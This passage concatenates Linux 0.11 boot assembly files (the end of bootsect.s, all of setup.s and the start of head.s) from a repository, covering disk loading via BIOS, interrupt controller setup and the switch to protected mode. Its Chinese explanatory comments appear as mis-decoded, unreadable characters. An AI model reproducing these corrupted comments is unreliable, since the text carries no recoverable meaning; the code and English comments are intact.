! at 0x10000, using BIOS interrupts.
!
! NOTE! currently system is at most 8*65536 bytes long. This should be no
! problem, even in the future. I want to keep it simple. This 512 kB
! kernel size should be enough, especially as this doesn't contain the
! buffer cache as in minix
!
! The loader has been made as simple as possible, and continuos
! read errors will result in a unbreakable loop. Reboot by hand. It
! loads pretty fast by getting whole sectors at a time whenever possible.
!
! ǰЩֵķ룺
! bootsect.s (C) 1991 Linus Torvalds Ȩ
!
! bootsect.s bios-ӳ0x7c00 (31k)Լ
! Ƶ˵ַ0x90000 (576k)ת
!
! ȻʹBIOS жϽ'setup'ֱӼصԼĺ(0x90200)(576.5k)
! system صַ0x10000
!
! ע! ĿǰںϵͳΪ(8*65536)(512k)ֽڣʹ
! ҲӦûġּˡ512k ں˳Ӧ
! 㹻ˣûminix һٻ塣
!
! سѾĹˣԳĶѭֹֻ
! ֻҪܣͨһȡȡеع̿ĺܿġ
.globl begtext, begdata, begbss, endtext, enddata, endbss ! 6 ȫֱʶ
.text ! ıΣ
begtext:
.data ! ݶΣ
begdata:
.bss ! ջΣ
begbss:
.text ! ıΣ
SETUPLEN = 4 ! nr of setup-sectors
! setup (setup-sectors)ֵ
BOOTSEG = 0x07c0 ! original address of boot-sector
! bootsect ԭʼַǶεַͬ
INITSEG = 0x9000 ! we move boot here - out of the way
! bootsect Ƶ -- ܿ
SETUPSEG = 0x9020 ! setup starts here
! setup ↑ʼ
SYSSEG = 0x1000 ! system loaded at 0x10000 (65536).
! system ģص0x1000064 kB
ENDSEG = SYSSEG + SYSSIZE ! where to stop loading
! ֹͣصĶεַ
! ROOT_DEV: 0x000 - same type of floppy as boot.
! ļϵͳ豸ʹʱͬ豸
! 0x301 - first partition on first drive etc
! ļϵͳ豸ڵһӲ̵ĵһϣȵȣ
ROOT_DEV = 0x306 ! ָļϵͳ豸ǵ2 Ӳ̵ĵ1 Linux ʽӲ
! ʽ,ֵĺ£
! 豸=豸*256 + 豸ţҲdev_no = (major<<8) + minor
! 豸ţ1-ڴ,2-,3-Ӳ,4-ttyx,5-tty,6-п,7-ܵ
! 0x300 - /dev/hd0 - 1 Ӳ̣
! 0x301 - /dev/hd1 - 1 ̵ĵ1
!
! 0x304 - /dev/hd4 - 1 ̵ĵ4
! 0x305 - /dev/hd5 - 2 Ӳ̣
! 0x306 - /dev/hd6 - 2 ̵ĵ1
!
! 0x309 - /dev/hd9 - 2 ̵ĵ4
! linux ں0.95 Ѿʹͬˡ
entry start ! ֪ӳstart ſʼִС
start: ! 47--56 ǽ(bootsect)Ŀǰλ0x07c0(31k)
! ƶ0x9000(576k)256 ֣512 ֽڣȻת
! ƶgo ŴҲһ䴦
mov ax,#BOOTSEG ! ds μĴΪ0x7C0
mov ds,ax
mov ax,#INITSEG ! es μĴΪ0x9000
mov es,ax
mov cx,#256 ! ƶֵ=256 ֣
sub si,si ! Դַ ds:si = 0x07C0:0x0000
sub di,di ! Ŀĵַ es:di = 0x9000:0x0000
rep ! ظִУֱcx = 0
movw ! ƶ1 ֣
jmpi go,INITSEG ! תINITSEG ָתĶεַ
go: mov ax,cs ! dses ss óƶڵĶδ(0x9000)
mov ds,ax ڳжջ(push,pop,call)˱öջ
mov es,ax
! put stack at 0x9ff00. ! ջָsp ָ0x9ff00(0x9000:0xff00)
mov ss,ax
mov sp,#0xFF00 ! arbitrary value >>512
! ڴƶˣҪöջελá
! sp ֻҪָԶ512 ƫƣַ0x90200
! ԡΪ0x90200 ַʼҪsetup
! ʱsetup ԼΪ4 sp Ҫָ
! ڣ0x200 + 0x200 * 4 + ջС
! load the setup-sectors directly after the bootblock.
! Note that 'es' is already set up.
! bootsect żsetup ģĴݡ
! עes Ѿúˡƶʱes ѾָĿĶεַ0x9000
load_setup:
! 68--77 е;BIOS жINT 0x13 setup ģӴ̵2
! ʼ0x90200 ʼ4 λ
! ԣû·INT 0x13 ʹ÷£
!
! ah = 0x02 - ڴ棻al = Ҫ
! ch = ŵ()ŵĵ8 λ cl = ʼ(0-5 λ)ŵŸ2 λ(6-7)
! dh = ͷţ dl = ţӲҪλ7
! es:bx ??ָݻ CF ־λ
mov dx,#0x0000 ! drive 0, head 0
mov cx,#0x0002 ! sector 2, track 0
mov bx,#0x0200 ! address = 512, in INITSEG
mov ax,#0x0200+SETUPLEN ! service 2, nr of sectors
int 0x13 ! read it
jnc ok_load_setup ! ok - continue
mov dx,#0x0000
mov ax,#0x0000 ! reset the diskette
int 0x13
j load_setup
ok_load_setup:
! Get disk drive parameters, specifically nr of sectors/track
! ȡIJرÿ
! ȡINT 0x13 øʽͷϢ£
! ah = 0x08 dl = ţӲҪλ7 Ϊ1
! Ϣ
! CF λah = ״̬롣
! ah = 0 al = 0 bl = ͣAT/PS2
! ch = ŵŵĵ8 λcl = ÿŵ(λ0-5)ŵŸ2 λ(λ6-7)
! dh = ͷ dl =
! es:di -?? ̲
mov dl,#0x00
mov ax,#0x0800 ! AH=8 is get drive parameters
int 0x13
mov ch,#0x00
seg cs ! ʾһIJcs μĴָĶС
mov sectors,cx ! ÿŵ
mov ax,#INITSEG
mov es,ax ! Ϊȡ̲жϸĵes ֵ¸Ļء
! Print some inane message ! ʾһЩϢ('Loading system ...'سУ24 ַ)
mov ah,#0x03 ! read cursor pos
xor bh,bh ! λá
int 0x10
mov cx,#24 ! 24 ַ
mov bx,#0x0007 ! page 0, attribute 7 (normal)
mov bp,#msg1 ! ָҪʾַ
mov ax,#0x1301 ! write string, move cursor
int 0x10 ! дַƶꡣ
! ok, we've written the message, now
! we want to load the system (at 0x10000) ! ڿʼsystem ģص0x10000(64k)
mov ax,#SYSSEG
mov es,ax ! segment of 0x010000 ! es = system Ķεַ
call read_it ! system ģ飬es Ϊ
call kill_motor ! رͿ֪״̬ˡ
! After that we check which root-device to use. If the device is
! defined (!= 0), nothing is done and the given device is used.
! Otherwise, either /dev/PS0 (2,28) or /dev/at0 (2,8), depending
! on the number of sectors that the BIOS reports currently.
! ˺ǼҪʹĸļϵͳ豸Ƹ豸Ѿָ豸(!=0)
! ֱʹø豸ҪBIOS ÿŵ
! ȷʹ/dev/PS0 (2,28) /dev/at0 (2,8)
! һ豸ļĺ壺
! Linux 豸2(μ43 еע)豸 = type*4 + nr
! nr Ϊ0-3 ֱӦABC Dtype ͣ2??1.2M 7??1.44M ȣ
! Ϊ7*4 + 0 = 28 /dev/PS0 (2,28)ָ1.44M A ,豸0x021c
! ͬ /dev/at0 (2,8)ָ1.2M A 豸0x0208
seg cs
mov ax,root_dev ! 豸
cmp ax,#0
jne root_defined
seg cs
mov bx,sectors ! ȡ88 бÿŵsectors=15
! ˵1.2Mb sectors=18˵
! 1.44Mb ΪǿԿ϶A
mov ax,#0x0208 ! /dev/ps0 - 1.2Mb
cmp bx,#15 ! жÿŵǷ=15
je root_defined ! ڣax о豸š
mov ax,#0x021c ! /dev/PS0 - 1.44Mb
cmp bx,#18
je root_defined
undef_root: ! һѭ
jmp undef_root
root_defined:
seg cs
mov root_dev,ax ! 豸ű
! after that (everyting loaded), we jump to
! the setup-routine loaded directly after
! the bootblock:
! ˣгϣǾת
! bootsect setup ȥ
jmpi 0,SETUPSEG ! ת0x9020:0000(setup.s Ŀʼ)
!!!! ˾ͽˡ!!!!
! ӳ
! This routine loads the system at address 0x10000, making sure
! no 64kB boundaries are crossed. We try to load it as fast as
! possible, loading whole tracks whenever we can.
!
! in: es - starting address segment (normally 0x1000)
!
! ӳϵͳģصڴַ0x10000 ȷûпԽ64KB ڴ߽硣ͼ
! ؽмأֻҪܣÿμŵݡ
! 룺es C ʼڴֵַͨ0x1000
sread: .word 1+SETUPLEN ! sectors read of current track
! ǰŵѶʼʱѾ1
! bootsect setup ռSETUPLEN
head: .word 0 ! current head !ǰͷš
track: .word 0 ! current track !ǰŵš
read_it:
! Ķֵλڴַ64KB ߽紦ѭbx Ĵڱʾǰ
! ݵĿʼλá
mov ax,es
test ax,#0x0fff
die: jne die ! es must be at 64kB boundary ! es ֵλ64KB ַ߽!
xor bx,bx ! bx is starting address within segment ! bx Ϊƫλá
rp_read:
! жǷѾȫݡȽϵǰǷϵͳĩĶ(#ENDSEG)Ǿ
! תok1_read Ŵݡ˳ӳء
mov ax,es
cmp ax,#ENDSEG ! have we loaded all yet? ! ǷѾȫݣ
jb ok1_read
ret
ok1_read:
! ֤ǰŵҪȡax ĴС
! ݵǰŵδȡԼֽڿʼƫλãȫȡЩδ
! ֽǷᳬ64KB γȵơᳬݴ˴ֽܶ(64KB C
! ƫλ)˴Ҫȡ
seg cs
mov ax,sectors ! ȡÿŵ
sub ax,sread ! ȥǰŵѶ
mov cx,ax ! cx = ax = ǰŵδ
shl cx,#9 ! cx = cx * 512 ֽڡ
add cx,bx ! cx = cx + ڵǰƫֵ(bx)
! = ˴ζڹֽ
jnc ok2_read ! ûг64KB ֽڣתok2_read ִС
je ok2_read
xor ax,ax ! ϴ˴νŵδʱᳬ64KB
sub ax,bx ! ʱֽܶ(64KB C ڶƫλ)ת
shr ax,#9 ! Ҫȡ
ok2_read:
call read_track
mov cx,ax ! cx = ôβѶȡ
add ax,sread ! ǰŵѾȡ
seg cs
cmp ax,sectors ! ǰŵϵĻδתok3_read
jne ok3_read
! ôŵһͷ(1 Ŵͷ)ϵݡѾɣȥһŵ
mov ax,#1
sub ax,head ! жϵǰͷš
jne ok4_read ! 0 ͷȥ1 ͷϵݡ
inc track ! ȥһŵ
ok4_read:
mov head,ax ! 浱ǰͷš
xor ax,ax ! 嵱ǰŵѶ
ok3_read:
mov sread,ax ! 浱ǰŵѶ
shl cx,#9 ! ϴѶ*512 ֽڡ
add bx,cx ! ǰݿʼλá
jnc rp_read ! С64KB ֵ߽תrp_read(156 )ݡ
! ǰΣΪһ
mov ax,es
add ax,#0x1000 ! λַΪָһ64KB ڴ档
mov es,ax
xor bx,bx ! ݿʼƫֵ
jmp rp_read ! תrp_read(156 )ݡ
! ǰŵָʼݵes:bx ʼμ67 ¶BIOS ̶ж
! int 0x13ah=2 ˵
! al C es:bx C ʼλá
read_track:
push ax
push bx
push cx
push dx
mov dx,track ! ȡǰŵš
mov cx,sread ! ȡǰŵѶ
inc cx ! cl = ʼ
mov ch,dl ! ch = ǰŵš
mov dx,head ! ȡǰͷš
mov dh,dl ! dh = ͷš
mov dl,#0 ! dl = (Ϊ0 ʾǰ)
and dx,#0x0100 ! ͷŲ1
mov ah,#2 ! ah = 2ܺš
int 0x13
jc bad_rt ! תbad_rt
pop dx
pop cx
pop bx
pop ax
ret
! ִλжϹܺ0תread_track ԡ
bad_rt: mov ax,#0
mov dx,#0
int 0x13
pop dx
pop cx
pop bx
pop ax
jmp read_track
/*
* This procedure turns off the floppy drive motor, so
* that we enter the kernel in a known state, and
* don't have to worry about it later.
*/
! ӳڹرǽں˺֪״̬ԺҲ뵣ˡ
kill_motor:
push dx
mov dx,#0x3f2 ! ƿ˿ڣֻд
mov al,#0 ! A رFDCֹDMA жر
outb ! al еdx ָĶ˿ȥ
pop dx
ret
sectors:
.word 0 ! ŵǰÿŵ
msg1:
.byte 13,10 ! سеASCII 롣
.ascii "Loading system ..."
.byte 13,10,13,10 ! 24 ASCII ַ
.org 508 ! ʾӵַ508(0x1FC)ʼroot_dev
! ĵ508 ʼ2 ֽС
root_dev:
.word ROOT_DEV ! Ÿļϵͳڵ豸(init/main.c л)
boot_flag:
.word 0xAA55 ! ӲЧʶ
.text
endtext:
.data
enddata:
.bss
endbss:
|
Akagi201/linux-0.11
| 8,163
|
boot/setup.s
|
!
! setup.s (C) 1991 Linus Torvalds
!
! setup.s is responsible for getting the system data from the BIOS,
! and putting them into the appropriate places in system memory.
! both setup.s and system has been loaded by the bootblock.
!
! This code asks the bios for memory/disk/other parameters, and
! puts them in a "safe" place: 0x90000-0x901FF, ie where the
! boot-block used to be. It is then up to the protected mode
! system to read them from there before the area is overwritten
! for buffer-blocks.
!
! setup.s BIOS лȡϵͳݣЩݷŵϵͳڴʵط
! ʱsetup.s system Ѿbootsect صڴС
!
! δѯbios йڴ//Щŵһ
! ȫġط0x90000-0x901FFҲԭbootsect
! ĵطȻڱ鸲ǵ֮ǰɱģʽsystem ȡ
!
! NOTE! These had better be the same as in bootsect.s!
! Щúbootsect.s еͬ
INITSEG = 0x9000 ! we move boot here - out of the way ! ԭbootsect ĶΡ
SYSSEG = 0x1000 ! system loaded at 0x10000 (65536). ! system 0x10000(64k)
SETUPSEG = 0x9020 ! this is the current segment ! ڵĶεַ
.globl begtext, begdata, begbss, endtext, enddata, endbss
.text
begtext:
.data
begdata:
.bss
begbss:
.text
entry start
start:
! ok, the read went well so we get current cursor position and save it for
! posterity.
! ok̶̹ڽλñԱʹá
mov ax,#INITSEG ! this is done in bootsect already, but...
! ds ó#INITSEG(0x9000)Ѿbootsect
! ùsetup Linus Ҫ
! һ¡
mov ds,ax
mov ah,#0x03 ! read cursor pos
! BIOS ж0x10 Ķ깦ܺ ah = 0x03
! 룺bh = ҳ
! أch = ɨ迪ʼߣcl = ɨߣ
! dh = к(0x00 Ƕ)dl = к(0x00 )
xor bh,bh
int 0x10 ! save it in known place, con_init fetches
mov [0],dx ! it from 0x90000.
! ˵λϢ0x90000 ̨
! ʼʱȡ
! Get memory size (extended mem, kB) ! 3 ȡչڴĴСֵKB
! ǵж0x15ܺah = 0x88
! أax = 0x1000001MʼչڴС(KB)
! CF λax = 롣
mov ah,#0x88
int 0x15
mov [2],ax ! չڴֵ0x90002 1 ֣
! Get video-card data: ! ȡʾǰʾģʽ
! BIOS ж0x10ܺ ah = 0x0f
! أah = ַal = ʾģʽbh = ǰʾҳ
! 0x90004(1 )ŵǰҳ0x90006 ʾģʽ0x90007 ַ
mov ah,#0x0f
int 0x10
mov [4],bx ! bh = display page
mov [6],ax ! al = video mode, ah = window width
! check for EGA/VGA and some config parameters ! ʾʽEGA/VGAȡ
! BIOS ж0x10ӹѡ -ȡʽϢ
! ܺţah = 0x12bl = 0x10
! أbh = ʾ״̬
! (0x00 - ɫģʽI/O ˿=0x3dX)
! (0x01 - ɫģʽI/O ˿=0x3bX)
! bl = װʾڴ
! (0x00 - 64k, 0x01 - 128k, 0x02 - 192k, 0x03 = 256k)
! cx = ʾԲ(μ˵)
mov ah,#0x12
mov bl,#0x10
int 0x10
mov [8],ax ! 0x90008 = ??
mov [10],bx ! 0x9000A = װʾڴ棬0x9000B = ʾ״̬(ɫ/ɫ)
mov [12],cx ! 0x9000C = ʾԲ
! Get hd0 data ! ȡһӲ̵ϢӲ̲
! 1 Ӳַ̲Ȼж0x41 ֵ2 Ӳ
! ӵ1 ĺ棬ж0x46 ֵҲָ2 Ӳ
! IJַij16 ֽ(0x10)
! γֱBIOS йӲ̵IJ0x90080 ŵ1
! Ӳ̵ı0x90090 ŵ2 Ӳ̵ı
mov ax,#0x0000
mov ds,ax
lds si,[4*0x41] ! ȡж0x41 ֵҲhd0 ĵַ??ds:si
mov ax,#INITSEG
mov es,ax
mov di,#0x0080 ! Ŀĵַ: 0x9000:0x0080 ?? es:di
mov cx,#0x10 ! 0x10 ֽڡ
rep
movsb
! Get hd1 data
mov ax,#0x0000
mov ds,ax
lds si,[4*0x46] ! ȡж0x46 ֵҲhd1 ĵַ??ds:si
mov ax,#INITSEG
mov es,ax
mov di,#0x0090 ! Ŀĵַ: 0x9000:0x0090 ?? es:di
mov cx,#0x10
rep
movsb
! Check that there IS a hd1 :-) ! ϵͳǷڵ2 Ӳ̣2 㡣
! BIOS жϵ0x13 ȡܡ
! ܺ ah = 0x15
! 룺dl = ţ0x8X Ӳ̣0x80 ָ1 Ӳ̣0x81 2 Ӳ̣
! ah = 룻00 --ụ̂CF λ 01 --ûchange-line ֧֣
! 02 --(ƶ豸)change-line ֧֣ 03 --Ӳ̡
mov ax,#0x01500
mov dl,#0x81
int 0x13
jc no_disk1
cmp ah,#3 ! Ӳ( = 3 )
je is_disk1
no_disk1:
mov ax,#INITSEG ! 2 Ӳ̲ڣԵ2 Ӳ̱㡣
mov es,ax
mov di,#0x0090
mov cx,#0x10
mov ax,#0x00
rep
stosb
is_disk1:
! now we want to move to protected mode ... ! ↑ʼҪģʽĹˡ
cli ! no interrupts allowed ! ! ʱжϡ
! first we move the system to it's rightful place
! ǽsystem ģƵȷλá
! bootsect ǽsystem ģ뵽0x1000064kʼλáڵʱ
! system ģȲᳬ0x80000512kҲĩ˲ᳬڴַ0x90000
! bootsect ὫԼƶ0x90000 ʼĵطsetup صĺ档
! γ;ٰsystem ģƶ0x00000 λãѴ0x10000 0x8ffff
! ڴݿ(512k)ڴͶƶ0x1000064kλá
mov ax,#0x0000
cld ! 'direction'=0, movs moves forward
do_move:
mov es,ax ! destination segment ! es:di??Ŀĵַ(ʼΪ0x0000:0x0)
add ax,#0x1000
cmp ax,#0x9000 ! ѾѴ0x8000 οʼ64k ƶꣿ
jz end_move
mov ds,ax ! source segment ! ds:si??Դַ(ʼΪ0x1000:0x0)
sub di,di
sub si,si
mov cx,#0x8000 ! ƶ0x8000 ֣64k ֽڣ
rep
movsw
jmp do_move
! then we load the segment descriptors
! ˺Ǽض
! ↑ʼ32 λģʽIJҪIntel 32 λģʽ̷֪ʶ,
! йⷽϢбļܻ¼еϸ˵Ҫ˵
!
! lidt ָڼж(idt)ĴIJ6 ֽڣ0-1 ֽ
! ֵ(ֽ)2-5 ֽ32 λԻַַʽμ
! 219-220 к223-224 е˵жеÿһ8 ֽڣָжʱ
! ҪõĴϢжЩƣҪϢ
!
! lgdt ָڼȫ(gdt)Ĵʽlidt ָͬȫ
! еÿ(8 ֽ)˱ģʽݺʹΣ飩Ϣаε
! (16 λ)εԻַ32 λεȨǷڴ桢дԼ
! һЩģʽеı־μ205-216 С
!
end_move:
mov ax,#SETUPSEG ! right, forgot this at first. didn't work :-)
mov ds,ax ! ds ָ(setup)Ρ
lidt idt_48 ! load idt with 0,0
! ж(idt)Ĵidt_48 6 ֽڲλ
! (218 )ǰ2 ֽڱʾidt 4 ֽڱʾidt
! Ļַ
lgdt gdt_48 ! load gdt with whatever appropriate
! ȫ(gdt)Ĵgdt_48 6 ֽڲλ
! (222 )
! that was painless, now we enable A20
! ϵIJܼǿA20 ַߡμбйA20 źߵ˵
call empty_8042 ! ȴ뻺ա
! ֻе뻺ΪʱſԶд
mov al,#0xD1 ! command write ! 0xD1 -ʾҪдݵ
out #0x64,al ! 8042 P2 ˿ڡP2 ˿ڵλ1 A20 ߵѡͨ
! Ҫд0x60 ڡ
call empty_8042 ! ȴ뻺գǷܡ
mov al,#0xDF ! A20 on ! ѡͨA20 ַߵIJ
out #0x60,al
call empty_8042 ! 뻺ΪգʾA20 Ѿѡͨ
! well, that went ok, I hope. Now we have to reprogram the interrupts :-(
! we put them right after the intel-reserved hardware interrupts, at
! int 0x20-0x2F. There they won't mess up anything. Sadly IBM really
! messed this up with the original PC, and they haven't been able to
! rectify it afterwards. Thus the bios puts interrupts at 0x08-0x0f,
! which is used for the internal hardware interrupts as well. We just
! have to reprogram the 8259's, and it isn't fun.
!! ϣһDZ¶жϽб??
!! ǽǷôintel ӲжϺ棬int 0x20-0x2F
!! DzͻҵIBM ԭPC иˣԺҲûо
!! PC bios жϷ0x08-0x0fЩжҲڲӲжϡ
!! Ǿͱ¶8259 жϿб̣һ㶼û
mov al,#0x11 ! initialization sequence
! 0x11 ʾʼʼICW1 ֣ʾ
! شƬ8259 ҪICW4 ֡
out #0x20,al ! send it to 8259A-1 ! ͵8259A оƬ
.word 0x00eb,0x00eb ! jmp $+2, jmp $+2 ! $ ʾǰָĵַ
! תָһָʱá
out #0xA0,al ! and to 8259A-2 ! ٷ͵8259A оƬ
.word 0x00eb,0x00eb
mov al,#0x20 ! start of hardware int's (0x20)
out #0x21,al ! оƬICW2 ֣ʼжϺţҪַ
.word 0x00eb,0x00eb
mov al,#0x28 ! start of hardware int's 2 (0x28)
out #0xA1,al ! ʹоƬICW2 ֣оƬʼжϺš
.word 0x00eb,0x00eb
mov al,#0x04 ! 8259-1 is master
out #0x21,al ! оƬICW3 ֣оƬIR2 оƬINT
.word 0x00eb,0x00eb μб˵
mov al,#0x02 ! 8259-2 is slave
out #0xA1,al ! ʹоƬICW3 ֣ʾоƬINT о
! ƬIR2 ϡ
.word 0x00eb,0x00eb
mov al,#0x01 ! 8086 mode for both
out #0x21,al ! оƬICW4 ֡8086 ģʽͨEOI ʽ
! 跢ָλʼоƬ
.word 0x00eb,0x00eb
out #0xA1,al ʹоƬICW4 ֣ͬϡ
.word 0x00eb,0x00eb
mov al,#0xFF ! mask off all interrupts for now
out #0x21,al ! оƬж
.word 0x00eb,0x00eb
out #0xA1,al δоƬж
! well, that certainly wasn't fun :-(. Hopefully it works, and we don't
! need no steenking BIOS anyway (except for the initial loading :-).
! The BIOS-routine wants lots of unnecessary data, and it's less
! "interesting" anyway. This is how REAL programmers do it.
!
! Well, now's the time to actually move into protected mode. To make
! things as simple as possible, we do no register set-up or anything,
! we let the gnu-compiled 32-bit programs do that. We just jump to
! absolute address 0x00000, in 32-bit protected mode.
!! ߣεȻû??ϣܹҲҪζBIOS ˣ
!! ʼļ?BIOS ӳҪܶҪݣһ㶼ûȤǡ
!! Ա¡
! ý32 λģʽСȼػ״̬(lmsw - Load Machine Status Word)Ҳ
! ƼĴCR0λ0 1 CPU ڱģʽ
mov ax,#0x0001 ! protected mode (PE) bit ! ģʽλ(PE)
lmsw ax ! This is it! ! ػ״̬!
jmpi 0,8 ! jmp offset 0 of segment 8 (cs) ! תcs 8ƫ0
! Ѿsystem ģƶ0x00000 ʼĵطƫƵַ0Ķ
! ֵ8 ѾDZģʽµĶѡˣѡԼҪȨ
! ѡΪ16 λ2 ֽڣλ0-1 ʾȨ0-3linux ϵͳֻ
! õ0 ϵͳ3 ûλ2 ѡȫ(0)Ǿֲ
! (1)λ3-15 ָѡڼԶѡ
! 8(0b0000,0000,0000,1000)ʾȨ0ʹȫеĵ1 ָ
! Ļַ0μ209 Уתָͻȥִsystem еĴ롣
! This routine checks that the keyboard command queue is empty
! No timeout is used - if this hangs there is something wrong with
! the machine, and we probably couldn't proceed anyway.
! ӳǷΪաﲻʹóʱ -
! ˵PC ⣬Ǿûа취ٴȥˡ
! ֻе뻺Ϊʱ״̬Ĵλ2 = 0ſԶд
empty_8042:
.word 0x00eb,0x00eb ! תָĻ(תһ)൱ʱղ
in al,#0x64 ! 8042 status port ! AT ̿״̬Ĵ
test al,#2 ! is input buffer full? ! λ2뻺
jnz empty_8042 ! yes - loop
ret
gdt: ! ȫʼɶ8 ֽڳɡ
! 3 1 ã206 Уڡ2 ϵͳ
! 208-211 У3 ϵͳݶ(213-216 )ÿľ
! μб˵
.word 0,0,0,0 ! dummy ! 1 á
! gdt еƫΪ0x08شμĴ(ѡ)ʱʹõƫֵ
.word 0x07FF ! 8Mb - limit=2047 (2048*4096=8Mb)
.word 0x0000 ! base address=0
.word 0x9A00 ! code read/exec
.word 0x00C0 ! granularity=4096, 386
! gdt еƫ0x10ݶμĴ(ds )ʱʹõƫֵ
.word 0x07FF ! 8Mb - limit=2047 (2048*4096=8Mb)
.word 0x0000 ! base address=0
.word 0x9200 ! data read/write
.word 0x00C0 ! granularity=4096, 386
idt_48:
.word 0 ! idt limit=0
.word 0,0 ! idt base=0L
gdt_48:
.word 0x800 ! gdt limit=2048, 256 GDT entries
! ȫֱΪ2k ֽڣΪÿ8 ֽһ
! Աй256
.word 512+gdt,0x9 ! gdt base = 0X9xxxx
! 4 ֽڹɵڴԵַ0x0009<<16 + 0x0200+gdt
! Ҳ0x90200 + gdt(ڱеƫƵַ205 )
.text
endtext:
.data
enddata:
.bss
endbss:
|
Akagi201/linux-0.11
| 8,569
|
boot/head.s
|
/*
* linux/boot/head.s
*
* (C) 1991 Linus Torvalds
*/
/*
* head.s contains the 32-bit startup code.
*
* NOTE!!! Startup happens at absolute address 0x00000000, which is also where
* the page directory will exist. The startup code will be overwritten by
* the page directory.
*/
/*
* head.s 32 λ롣
* ע!!! 32 λǴӾԵַ0x00000000 ʼģҲͬҳĿ¼ڵĵط
* 뽫ҳĿ¼ǵ
*/
.text
.globl _idt,_gdt,_pg_dir,_tmp_floppy_area
_pg_dir: # ҳĿ¼
startup_32: # 18-22 øݶμĴ
movl $0x10,%eax # GNU ˵ÿֱҪ'$'ʼDZʾַ
# ÿĴҪ'%'ͷeax ʾ32 λax Ĵ
# ٴע!!! Ѿ32 λģʽ$0x10 ǰѵַ0x10 װ
# μĴʵȫֶеƫֵ߸ȷ˵һ
# ѡйѡ˵μsetup.s 193 µ˵$0x10 ĺ
# Ȩ0(λ0-1=0)ѡȫ(λ2=0)ѡе2 (λ3-15=2)ָ
ڵǰLinux ϵͳУgas gld ѾֱΪas ld
# еݶľֵμǰsetup.s 212213 У
# ĺǣds,es,fs,gs еѡΪsetup.s йݶΣȫֶ
# ĵ2 =0x10ջݶе_stack_start ڣȻʹµж
# ȫֶ.µȫֶгʼsetup.s еȫһ
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
mov %ax,%gs
lss _stack_start,%esp # ʾ_stack_start??ss:espϵͳջ
# stack_start kernel/sched.c69 С
call setup_idt # жӳ
call setup_gdt # ȫӳ
movl $0x10,%eax # reload all the segment registers
mov %ax,%ds # after changing gdt. CS was already
mov %ax,%es # reloaded in 'setup_gdt'
mov %ax,%fs # ΪgdtҪװеĶμĴ
mov %ax,%gs # CS μĴѾsetup_gdt ¼عˡ
lss _stack_start,%esp
# 32-36 ڲA20 ַǷѾõķڴַ0x000000 д
# һֵȻڴַ0x100000(1M)ǷҲֵһֱͬĻһֱ
# ȽȥҲѭʾַA20 ûѡͨں˾Ͳʹ1M ڴ档
xorl %eax,%eax
1: incl %eax # check that A20 really IS enabled
movl %eax,0x000000 # loop forever if it isn't
cmpl %eax,0x100000
je 1b # '1b'ʾ(backward)ת1 ȥ33 У
# '5f'ʾǰ(forward)ת5 ȥ
/*
* NOTE! 486 should set bit 16, to check for write-protect in supervisor
* mode. Then it would be unnecessary with the "verify_area()"-calls.
* 486 users probably want to set the NE (#5) bit also, so as to use
* int 16 for math errors.
*/
/*
* ע! γУ486 Ӧýλ16 λԼڳûģʽµд,
* ˺"verify_area()"оͲҪˡ486 ûͨҲ뽫NE(#5)λԱ
* ѧЭijʹint 16
*/
# γ43-65ڼѧЭоƬǷڡĿƼĴCR0
# ЭִһЭָĻ˵ЭоƬڣ
# ҪCR0 еЭλEMλ2λЭڱ־MPλ1
movl %cr0,%eax # check math chip
andl $0x80000011,%eax # Save PG,PE,ET
/* "orl $0x10020,%eax" here for 486 might be good */
orl $2,%eax # set MP
movl %eax,%cr0
call check_x87
jmp after_page_tables # ת135 С
/*
* We depend on ET to be correct. This checks for 287/387.
*/
/*
* ET ־ȷ287/387
*/
check_x87:
fninit
fstsw %ax
cmpb $0,%al
je 1f /* no coprocessor: have to set bits */
movl %cr0,%eax # ڵǰת1 дcr0
xorl $6,%eax /* reset MP, set EM */
movl %eax,%cr0
ret
.align 2 # ".align 2"ĺָ洢߽"2"ʾַ2 λΪ㣬
# 4 ֽڷʽڴַ
1: .byte 0xDB,0xE4 /* fsetpm for 287, ignored by 387 */ # 287 Э롣
ret
/*
* setup_idt
*
* sets up a idt with 256 entries pointing to
* ignore_int, interrupt gates. It then loads
* idt. Everything that wants to install itself
* in the idt-table may do so themselves. Interrupts
* are enabled elsewhere, when we can be relatively
* sure everything is ok. This routine will be over-
* written by the page tables.
*/
/*
* жӳ setup_idt
*
* жidt óɾ256 ָignore_int жšȻж
* Ĵ(lidt ָ)ʵõжԺٰװطΪһ
* ʱٿжϡӳᱻҳǵ
*/
# жеȻҲ8 ֽɣʽȫֱеIJͬΪ
# (Gate Descriptor)0-1,6-7 ֽƫ2-3 ֽѡ4-5 ֽһЩ־
setup_idt:
lea ignore_int,%edx # ignore_int Чַƫֵֵ??edx Ĵ
movl $0x00080000,%eax # ѡ0x0008 eax ĸ16 λС
movw %dx,%ax /* selector = 0x0008 = cs */
# ƫֵĵ16 λeax ĵ16 λСʱeax
#4 ֽڵֵ
movw $0x8E00,%dx /* interrupt gate - dpl=0, present */
# ʱedx 4 ֽڵֵ
lea _idt,%edi # _idt жĵַ
mov $256,%ecx
rp_sidt:
movl %eax,(%edi) # жС
movl %edx,4(%edi)
addl $8,%edi # edi ָһ
dec %ecx
jne rp_sidt
lidt idt_descr # жĴֵ
ret
/*
* setup_gdt
*
* This routines sets up a new gdt and loads it.
* Only two entries are currently built, the same
* ones that were built in init.s. The routine
* is VERY complicated at two whole lines, so this
* rather long comment is certainly needed :-).
* This routine will beoverwritten by the page tables.
*/
/*
* ȫ setup_gdt
* ӳһµȫgdtءʱǰ
* һӳֻУdzġӣԵȻҪôע?
setup_gdt:
lgdt gdt_descr # ȫĴ(úã232-238 )
ret
/*
* I put the kernel page tables right after the page directory,
* using 4 of them to span 16 Mb of physical memory. People with
* more than 16MB will have to expand this.
*/
/* Linus ں˵ڴҳֱӷҳĿ¼֮ʹ4 Ѱַ16 Mb ڴ档
* ж16 Mb ڴ棬Ҫġ
*/
# ÿҳΪ4 Kb ֽڣÿҳҪ4 ֽڣһҳԴ1000
# һѰַ4 Kb ĵַռ䣬һҳͿѰַ4 Mb ڴ档
# ҳĸʽΪǰ0-11 λһЩ־Ƿڴ(P λ0)д(R/W λ1)
# ͨûdzûʹ(U/S λ2)ǷĹ(Ƿ)(D λ6)ȣλ12-31
# ҳַָһҳڴʼַ
.org 0x1000 # ƫ0x1000 ʼǵ1 ҳƫ0 ʼҳĿ¼
pg0:
.org 0x2000
pg1:
.org 0x3000
pg2:
.org 0x4000
pg3:
.org 0x5000 # ڴݿƫ0x5000 ʼ
/*
* tmp_floppy_area is used by the floppy-driver when DMA cannot
